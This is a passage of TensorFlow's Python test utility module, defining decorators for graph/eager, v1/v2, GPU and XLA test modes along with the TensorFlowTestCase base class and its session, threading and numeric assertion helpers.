for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) + [("testcase_name",
"_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
unittest.TestLoader.testMethodPrefix) and not (
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or name == "test_session"):
setattr(cls, name, base_decorator(value))
return cls
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args, tensor_indices = zip(*[(x, i)
for i, x in enumerate(args)
if isinstance(x, (ops.Tensor,
variables.Variable))])
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only comptaible in v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
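# Illustrative usage:
#   if is_gpu_available(cuda_only=True, min_cuda_compute_capability=(3, 5)):
#     ...  # exercise the CUDA-specific portion of a test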
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders, we should be able to
call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal of completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
# The description is just for documentation purposes.
def disable_all_xla(description):
def disable_all_impl(cls):
"""Execute all test methods in this class only if xla is not enabled."""
base_decorator = disable_xla
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and not name == "test_session":
setattr(cls, name, base_decorator(description)(value))
return cls
return disable_all_impl
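# Hedged usage sketch (hypothetical test names, not part of the original file):
# `disable_xla` turns a single test method into a no-op when XLA is enabled,
# while `disable_all_xla` does the same for every `test*` method of a class.
class _ExampleXlaSensitiveTest(googletest.TestCase):
  @disable_xla("example: depends on non-XLA kernel behaviour")
  def testNonXlaOnly(self):
    self.assertEqual(2 * 2, 4)
@disable_all_xla("example: the whole suite is incompatible with XLA")
class _ExampleNonXlaSuite(googletest.TestCase):
  def testAlsoSkippedUnderXla(self):
    self.assertTrue(True)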
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
os.putenv(
"TF_XLA_FLAGS", "--tf_xla_auto_jit=2 --tf_xla_min_cluster_size=1 "
"--tf_xla_enable_lazy_compilation=false")
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Avoid calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices, tensor.values,
tensor.dense_shape)
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True from just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means the thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| <= err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if that does not work, traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
